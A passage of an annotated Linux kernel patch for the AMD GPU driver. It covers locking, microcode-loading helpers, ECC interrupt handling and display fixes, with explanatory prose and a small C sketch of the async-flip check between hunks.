+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+index e9b45089a28a6..863b2a34b2d64 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_sched.c
+@@ -38,6 +38,7 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ {
+ 	struct fd f = fdget(fd);
+ 	struct amdgpu_fpriv *fpriv;
++	struct amdgpu_ctx_mgr *mgr;
+ 	struct amdgpu_ctx *ctx;
+ 	uint32_t id;
+ 	int r;
+@@ -51,8 +52,11 @@ static int amdgpu_sched_process_priority_override(struct amdgpu_device *adev,
+ 		return r;
+ 	}
+ 
+-	idr_for_each_entry(&fpriv->ctx_mgr.ctx_handles, ctx, id)
++	mgr = &fpriv->ctx_mgr;
++	mutex_lock(&mgr->lock);
++	idr_for_each_entry(&mgr->ctx_handles, ctx, id)
+ 		amdgpu_ctx_priority_override(ctx, priority);
++	mutex_unlock(&mgr->lock);
+ 
+ 	fdput(f);
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+index 5cb62e6249c23..6e7058a2d1c82 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+@@ -1091,3 +1091,39 @@ void amdgpu_ucode_ip_version_decode(struct amdgpu_device *adev, int block_type,
+ 
+ 	snprintf(ucode_prefix, len, "%s_%d_%d_%d", ip_name, maj, min, rev);
+ }
++
++/*
++ * amdgpu_ucode_request - Fetch and validate amdgpu microcode
++ *
++ * @adev: amdgpu device
++ * @fw: pointer to load firmware to
++ * @fw_name: firmware to load
++ *
++ * This is a helper that will use request_firmware and amdgpu_ucode_validate
++ * to load and run basic validation on firmware. If the load fails, remap
++ * the error code to -ENODEV, so that early_init functions will fail to load.
++ */
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name)
++{
++	int err = request_firmware(fw, fw_name, adev->dev);
++
++	if (err)
++		return -ENODEV;
++	err = amdgpu_ucode_validate(*fw);
++	if (err)
++		dev_dbg(adev->dev, "\"%s\" failed to validate\n", fw_name);
++
++	return err;
++}
++
++/*
++ * amdgpu_ucode_release - Release firmware microcode
++ *
++ * @fw: pointer to firmware to release
++ */
++void amdgpu_ucode_release(const struct firmware **fw)
++{
++	release_firmware(*fw);
++	*fw = NULL;
++}
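The helper pair above standardizes the fetch/validate/release lifecycle
that the mes_v10_1 and mes_v11_0 call sites later in this patch migrate
to; a failed fetch is remapped to -ENODEV so the IP block's early_init
fails cleanly. The intended call shape, mirroring
amdgpu_mes_init_microcode() earlier in the patch (fragment, not a
complete function):

	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
	if (r)
		goto out;

	/* ... parse adev->mes.fw[pipe]->data ... */
	return 0;
out:
	amdgpu_ucode_release(&adev->mes.fw[pipe]);	/* frees and NULLs via the double pointer */
	return r;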
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+index 552e06929229c..848579d4988bc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.h
+@@ -544,6 +544,9 @@ void amdgpu_ucode_print_sdma_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_psp_hdr(const struct common_firmware_header *hdr);
+ void amdgpu_ucode_print_gpu_info_hdr(const struct common_firmware_header *hdr);
+ int amdgpu_ucode_validate(const struct firmware *fw);
++int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
++			 const char *fw_name);
++void amdgpu_ucode_release(const struct firmware **fw);
+ bool amdgpu_ucode_hdr_version(union amdgpu_firmware_header *hdr,
+ 				uint16_t hdr_major, uint16_t hdr_minor);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 5dde6f82a1ca0..849a2cb191b4e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3845,7 +3845,8 @@ static int gfx_v9_0_hw_fini(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__GFX))
++		amdgpu_irq_put(adev, &adev->gfx.cp_ecc_error_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_reg_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gfx.priv_inst_irq, 0);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+index 21e46817d82d9..d8cb92a8cef85 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+@@ -1145,7 +1145,6 @@ static int gmc_v10_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 4326078689cd6..9760d7becde27 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -941,7 +941,6 @@ static int gmc_v11_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 	gmc_v11_0_gart_disable(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+index 08d6cf79fb15d..c9948f78b2ba9 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+@@ -1963,7 +1963,6 @@ static int gmc_v9_0_hw_fini(void *handle)
+ 	if (adev->mmhub.funcs->update_power_gating)
+ 		adev->mmhub.funcs->update_power_gating(adev, false);
+ 
+-	amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+index a1b751d9ac064..323d68b2124fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/jpeg_v3_0.c
+@@ -54,6 +54,7 @@ static int jpeg_v3_0_early_init(void *handle)
+ 
+ 	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(3, 1, 1):
++	case IP_VERSION(3, 1, 2):
+ 		break;
+ 	default:
+ 		harvest = RREG32_SOC15(JPEG, 0, mmCC_UVD_HARVESTING);
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+index 614394118a53e..7848b9de79ce9 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v10_1.c
+@@ -379,89 +379,6 @@ static const struct amdgpu_mes_funcs mes_v10_1_funcs = {
+ 	.resume_gang = mes_v10_1_resume_gang,
+ };
+ 
+-static int mes_v10_1_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	const char *chip_name;
+-	char fw_name[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	switch (adev->ip_versions[GC_HWIP][0]) {
+-	case IP_VERSION(10, 1, 10):
+-		chip_name = "navi10";
+-		break;
+-	case IP_VERSION(10, 3, 0):
+-		chip_name = "sienna_cichlid";
+-		break;
+-	default:
+-		BUG();
+-	}
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 chip_name);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 chip_name);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v10_1_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v10_1_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1019,10 +936,6 @@ static int mes_v10_1_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v10_1_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v10_1_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1059,8 +972,7 @@ static int mes_v10_1_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v10_1_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1229,6 +1141,22 @@ static int mes_v10_1_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v10_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v10_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1241,6 +1169,7 @@ static int mes_v10_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v10_1_ip_funcs = {
+ 	.name = "mes_v10_1",
++	.early_init = mes_v10_0_early_init,
+ 	.late_init = mes_v10_0_late_init,
+ 	.sw_init = mes_v10_1_sw_init,
+ 	.sw_fini = mes_v10_1_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 1c4787000a5f3..03844a82462fe 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -460,80 +460,6 @@ static const struct amdgpu_mes_funcs mes_v11_0_funcs = {
+ 	.misc_op = mes_v11_0_misc_op,
+ };
+ 
+-static int mes_v11_0_init_microcode(struct amdgpu_device *adev,
+-				    enum admgpu_mes_pipe pipe)
+-{
+-	char fw_name[30];
+-	char ucode_prefix[30];
+-	int err;
+-	const struct mes_firmware_header_v1_0 *mes_hdr;
+-	struct amdgpu_firmware_info *info;
+-
+-	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
+-
+-	if (pipe == AMDGPU_MES_SCHED_PIPE)
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
+-			 ucode_prefix);
+-	else
+-		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes1.bin",
+-			 ucode_prefix);
+-
+-	err = request_firmware(&adev->mes.fw[pipe], fw_name, adev->dev);
+-	if (err)
+-		return err;
+-
+-	err = amdgpu_ucode_validate(adev->mes.fw[pipe]);
+-	if (err) {
+-		release_firmware(adev->mes.fw[pipe]);
+-		adev->mes.fw[pipe] = NULL;
+-		return err;
+-	}
+-
+-	mes_hdr = (const struct mes_firmware_header_v1_0 *)
+-		adev->mes.fw[pipe]->data;
+-	adev->mes.uc_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
+-	adev->mes.data_start_addr[pipe] =
+-		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
+-		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
+-
+-	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+-		int ucode, ucode_data;
+-
+-		if (pipe == AMDGPU_MES_SCHED_PIPE) {
+-			ucode = AMDGPU_UCODE_ID_CP_MES;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
+-		} else {
+-			ucode = AMDGPU_UCODE_ID_CP_MES1;
+-			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
+-		}
+-
+-		info = &adev->firmware.ucode[ucode];
+-		info->ucode_id = ucode;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
+-			      PAGE_SIZE);
+-
+-		info = &adev->firmware.ucode[ucode_data];
+-		info->ucode_id = ucode_data;
+-		info->fw = adev->mes.fw[pipe];
+-		adev->firmware.fw_size +=
+-			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
+-			      PAGE_SIZE);
+-	}
+-
+-	return 0;
+-}
+-
+-static void mes_v11_0_free_microcode(struct amdgpu_device *adev,
+-				     enum admgpu_mes_pipe pipe)
+-{
+-	release_firmware(adev->mes.fw[pipe]);
+-	adev->mes.fw[pipe] = NULL;
+-}
+-
+ static int mes_v11_0_allocate_ucode_buffer(struct amdgpu_device *adev,
+ 					   enum admgpu_mes_pipe pipe)
+ {
+@@ -1101,10 +1027,6 @@ static int mes_v11_0_sw_init(void *handle)
+ 		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
+ 			continue;
+ 
+-		r = mes_v11_0_init_microcode(adev, pipe);
+-		if (r)
+-			return r;
+-
+ 		r = mes_v11_0_allocate_eop_buf(adev, pipe);
+ 		if (r)
+ 			return r;
+@@ -1141,8 +1063,7 @@ static int mes_v11_0_sw_fini(void *handle)
+ 		amdgpu_bo_free_kernel(&adev->mes.eop_gpu_obj[pipe],
+ 				      &adev->mes.eop_gpu_addr[pipe],
+ 				      NULL);
+-
+-		mes_v11_0_free_microcode(adev, pipe);
++		amdgpu_ucode_release(&adev->mes.fw[pipe]);
+ 	}
+ 
+ 	amdgpu_bo_free_kernel(&adev->gfx.kiq.ring.mqd_obj,
+@@ -1339,6 +1260,22 @@ static int mes_v11_0_resume(void *handle)
+ 	return amdgpu_mes_resume(adev);
+ }
+ 
++static int mes_v11_0_early_init(void *handle)
++{
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	int pipe, r;
++
++	for (pipe = 0; pipe < AMDGPU_MAX_MES_PIPES; pipe++) {
++		if (!adev->enable_mes_kiq && pipe == AMDGPU_MES_KIQ_PIPE)
++			continue;
++		r = amdgpu_mes_init_microcode(adev, pipe);
++		if (r)
++			return r;
++	}
++
++	return 0;
++}
++
+ static int mes_v11_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1353,6 +1290,7 @@ static int mes_v11_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v11_0_ip_funcs = {
+ 	.name = "mes_v11_0",
++	.early_init = mes_v11_0_early_init,
+ 	.late_init = mes_v11_0_late_init,
+ 	.sw_init = mes_v11_0_sw_init,
+ 	.sw_fini = mes_v11_0_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 4d780e4430e78..77d5a6f304094 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -1941,9 +1941,11 @@ static int sdma_v4_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	for (i = 0; i < adev->sdma.num_instances; i++) {
+-		amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
+-			       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__SDMA)) {
++		for (i = 0; i < adev->sdma.num_instances; i++) {
++			amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
++				       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++		}
+ 	}
+ 
+ 	sdma_v4_0_ctx_switch_enable(adev, false);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 9eedc1a1494c0..4bf9d8cc8132b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -777,7 +777,7 @@ static int soc21_common_early_init(void *handle)
+ 			AMD_PG_SUPPORT_VCN_DPG |
+ 			AMD_PG_SUPPORT_GFX_PG |
+ 			AMD_PG_SUPPORT_JPEG;
+-		adev->external_rev_id = adev->rev_id + 0x1;
++		adev->external_rev_id = adev->rev_id + 0x80;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 422909d1f352b..abac86514328d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -39,6 +39,7 @@
+ #include "dc/dc_edid_parser.h"
+ #include "dc/dc_stat.h"
+ #include "amdgpu_dm_trace.h"
++#include "dc/inc/dc_link_ddc.h"
+ 
+ #include "vid.h"
+ #include "amdgpu.h"
+@@ -2262,6 +2263,14 @@ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ 		if (suspend) {
+ 			drm_dp_mst_topology_mgr_suspend(mgr);
+ 		} else {
++			/* if extended timeout is supported in hardware,
++			 * default to LTTPR timeout (3.2ms) first as a W/A for DP link layer
++			 * CTS 4.2.1.1 regression introduced by CTS specs requirement update.
++			 */
++			dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_LTTPR_TIMEOUT_PERIOD);
++			if (!dp_is_lttpr_present(aconnector->dc_link))
++				dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_TIMEOUT_PERIOD);
++
+ 			ret = drm_dp_mst_topology_mgr_resume(mgr, true);
+ 			if (ret < 0) {
+ 				dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
+@@ -7694,6 +7703,13 @@ static void amdgpu_dm_commit_cursors(struct drm_atomic_state *state)
+ 			handle_cursor_update(plane, old_plane_state);
+ }
+ 
++static inline uint32_t get_mem_type(struct drm_framebuffer *fb)
++{
++	struct amdgpu_bo *abo = gem_to_amdgpu_bo(fb->obj[0]);
++
++	return abo->tbo.resource ? abo->tbo.resource->mem_type : 0;
++}
++
+ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				    struct dc_state *dc_state,
+ 				    struct drm_device *dev,
+@@ -7767,6 +7783,8 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			continue;
+ 
+ 		dc_plane = dm_new_plane_state->dc_state;
++		if (!dc_plane)
++			continue;
+ 
+ 		bundle->surface_updates[planes_count].surface = dc_plane;
+ 		if (new_pcrtc_state->color_mgmt_changed) {
+@@ -7811,11 +7829,13 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 
+ 		/*
+ 		 * Only allow immediate flips for fast updates that don't
+-		 * change FB pitch, DCC state, rotation or mirroing.
++		 * change memory domain, FB pitch, DCC state, rotation or
++		 * mirroring.
+ 		 */
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+-			acrtc_state->update_type == UPDATE_TYPE_FAST;
++			acrtc_state->update_type == UPDATE_TYPE_FAST &&
++			get_mem_type(old_plane_state->fb) == get_mem_type(fb);
+ 
+ 		timestamp_ns = ktime_get_ns();
+ 		bundle->flip_addrs[planes_count].flip_timestamp_in_us = div_u64(timestamp_ns, 1000);
+@@ -9312,8 +9332,9 @@ static int dm_update_plane_state(struct dc *dc,
+ 			return -EINVAL;
+ 		}
+ 
++		if (dm_old_plane_state->dc_state)
++			dc_plane_state_release(dm_old_plane_state->dc_state);
+ 
+-		dc_plane_state_release(dm_old_plane_state->dc_state);
+ 		dm_new_plane_state->dc_state = NULL;
+ 
+ 		*lock_and_validation_needed = true;
+@@ -9850,6 +9871,7 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
+ 		if (ret) {
+ 			DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
++			ret = -EINVAL;
+ 			goto fail;
+ 		}
+ 
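
The get_mem_type() helper introduced above keys async ("immediate") flips to the buffer's memory placement: a fast update whose framebuffer migrated between domains (e.g. VRAM and GTT) can no longer flip immediately. A small sketch of that predicate, assuming made-up types rather than the DRM/TTM structures:

/* Sketch only: an async flip stays "immediate" when the update is fast and
 * the framebuffer's memory domain did not change.  Types are made up. */
#include <stdbool.h>
#include <stdio.h>

enum mem_type { MEM_NONE = 0, MEM_VRAM, MEM_GTT };

struct fb { enum mem_type placement; };

static enum mem_type get_mem_type(const struct fb *fb)
{
	return fb ? fb->placement : MEM_NONE;	/* mirror the NULL fallback */
}

static bool allow_immediate_flip(bool async, bool fast_update,
				 const struct fb *old_fb, const struct fb *new_fb)
{
	return async && fast_update &&
	       get_mem_type(old_fb) == get_mem_type(new_fb);
}

int main(void)
{
	struct fb vram = { MEM_VRAM }, gtt = { MEM_GTT };

	printf("same domain:    %d\n", allow_immediate_flip(true, true, &vram, &vram));
	printf("domain changed: %d\n", allow_immediate_flip(true, true, &vram, &gtt));
	return 0;
}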
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 60dd88666437d..994a37003217d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -1375,6 +1375,7 @@ int pre_validate_dsc(struct drm_atomic_state *state,
+ 	ret = pre_compute_mst_dsc_configs_for_state(state, local_dc_state, vars);
+ 	if (ret != 0) {
+ 		DRM_INFO_ONCE("pre_compute_mst_dsc_configs_for_state() failed\n");
++		ret = -EINVAL;
+ 		goto clean_exit;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+index 200fcec191861..1859b2e4a98a1 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+@@ -719,6 +719,8 @@ void dcn32_clk_mgr_construct(
+ 		struct pp_smu_funcs *pp_smu,
+ 		struct dccg *dccg)
+ {
++	struct clk_log_info log_info = {0};
++
+ 	clk_mgr->base.ctx = ctx;
+ 	clk_mgr->base.funcs = &dcn32_funcs;
+ 	if (ASICREV_IS_GC_11_0_2(clk_mgr->base.ctx->asic_id.hw_internal_rev)) {
+@@ -752,6 +754,7 @@ void dcn32_clk_mgr_construct(
+ 			clk_mgr->base.clks.ref_dtbclk_khz = 268750;
+ 	}
+ 
++
+ 	/* integer part is now VCO frequency in kHz */
+ 	clk_mgr->base.dentist_vco_freq_khz = dcn32_get_vco_frequency_from_reg(clk_mgr);
+ 
+@@ -759,6 +762,8 @@ void dcn32_clk_mgr_construct(
+ 	if (clk_mgr->base.dentist_vco_freq_khz == 0)
+ 		clk_mgr->base.dentist_vco_freq_khz = 4300000; /* Updated as per HW docs */
+ 
++	dcn32_dump_clk_registers(&clk_mgr->base.boot_snapshot, &clk_mgr->base, &log_info);
++
+ 	if (ctx->dc->debug.disable_dtb_ref_clk_switch &&
+ 			clk_mgr->base.clks.ref_dtbclk_khz != clk_mgr->base.boot_snapshot.dtbclk) {
+ 		clk_mgr->base.clks.ref_dtbclk_khz = clk_mgr->base.boot_snapshot.dtbclk;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index da164685547d9..21e9c86665f18 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -1707,6 +1707,9 @@ bool dc_remove_plane_from_context(
+ 	struct dc_stream_status *stream_status = NULL;
+ 	struct resource_pool *pool = dc->res_pool;
+ 
++	if (!plane_state)
++		return true;
++
+ 	for (i = 0; i < context->stream_count; i++)
+ 		if (context->streams[i] == stream) {
+ 			stream_status = &context->stream_status[i];
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 37998dc0fc144..b519602c054b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -796,6 +796,7 @@ struct dc_debug_options {
+ 	unsigned int force_odm_combine; //bit vector based on otg inst
+ 	unsigned int seamless_boot_odm_combine;
+ 	unsigned int force_odm_combine_4to1; //bit vector based on otg inst
++	int minimum_z8_residency_time;
+ 	bool disable_z9_mpc;
+ 	unsigned int force_fclk_khz;
+ 	bool enable_tri_buf;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 8f894c1d1d1eb..7af210bbc592f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -728,11 +728,15 @@ void dcn10_hubp_pg_control(
+ 	}
+ }
+ 
+-static void power_on_plane(
++static void power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	int plane_id)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, plane_id, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1239,11 +1243,15 @@ void dcn10_plane_atomic_power_down(struct dc *dc,
+ 			hws->funcs.hubp_pg_control(hws, hubp->inst, false);
+ 
+ 		dpp->funcs->dpp_reset(dpp);
++
